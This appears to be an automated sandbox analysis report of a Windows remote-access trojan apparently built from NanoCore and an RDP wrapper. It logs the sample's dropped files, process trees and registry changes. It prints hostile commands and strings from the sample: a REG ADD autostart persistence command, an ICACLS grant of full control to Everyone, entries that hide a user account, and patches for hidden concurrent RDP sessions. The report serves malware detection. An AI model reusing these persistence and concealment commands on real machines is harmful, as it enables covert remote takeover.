      Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
      Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeFile read: C:\Users\user\Desktop\Xjf4yH9N2t.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe 'C:\Users\user\Desktop\Xjf4yH9N2t.exe'
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
      Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
      Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
      Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
      Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
      Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
      Source: C:\ProgramData\images.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
      Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
      Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
      Source: Xjf4yH9N2t.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: Xjf4yH9N2t.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: Xjf4yH9N2t.exeStatic file information: File size 1309184 > 1048576
      Source: Xjf4yH9N2t.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x131e00
      Source: Xjf4yH9N2t.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
      Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: KetqqsbuJ.exe, 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
      Source: Binary string: RfxVmt.pdb source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
      Source: Binary string: RfxVmt.pdbGCTL source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: KetqqsbuJ.exe, 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: KetqqsbuJ.exe, 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdbUGP source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: KetqqsbuJ.exe, 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp

      Data Obfuscation:

      barindex
      Detected unpacking (creates a PE file in dynamic memory)Show sources
      Source: C:\ProgramData\images.exeUnpacked PE file: 22.2.images.exe.4240000.5.unpack
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 5_2_00084625 push esi; ret
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 6_2_000F4625 push esi; ret
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_004011C0 push eax; ret
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_004011C0 push eax; ret
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0041C225 pushad ; retn 0041h
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_004174D1 push ebp; retf
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00417570 push ebp; retf
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00764625 push esi; ret
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_004F4625 push ds; ret
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEE0F0 push edx; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEE36F push edx; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEE349 push edx; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEE471 push ebx; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BE8A70 push ss; retn B402h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BE8A61 push ss; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEEDB9 push esi; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BEED89 push esi; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BE93D9 push ds; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BE9660 push ds; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BE7A80 push cs; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_02BE7A71 push cs; retn 0002h
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_050AB5EC push eax; retf
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeCode function: 40_2_050A69F8 pushad ; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.55041675876
      Source: initial sampleStatic PE information: section name: .text entropy: 7.55041675876
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57991184815
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57991184815
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57991184815
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040290E URLDownloadToFileW,ShellExecuteW,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeFile created: C:\ProgramData\images.exeJump to dropped file
      Source: C:\ProgramData\images.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
      Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeJump to dropped file
      Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeFile created: C:\ProgramData\images.exeJump to dropped file
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

      Boot Survival:

      barindex
      Creates an undocumented autostart registry key Show sources
      Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows LoadJump to behavior
      Source: C:\Windows\system32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
      Source: C:\ProgramData\images.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Contains functionality to hide user accountsShow sources
      Source: Xjf4yH9N2t.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
      Source: Xjf4yH9N2t.exe, 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
      Source: images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
      Source: images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeFile opened: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe:Zone.Identifier read attributes | delete
      Hides user accountsShow sources
      Source: C:\ProgramData\images.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList jjIFKktJump to behavior
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
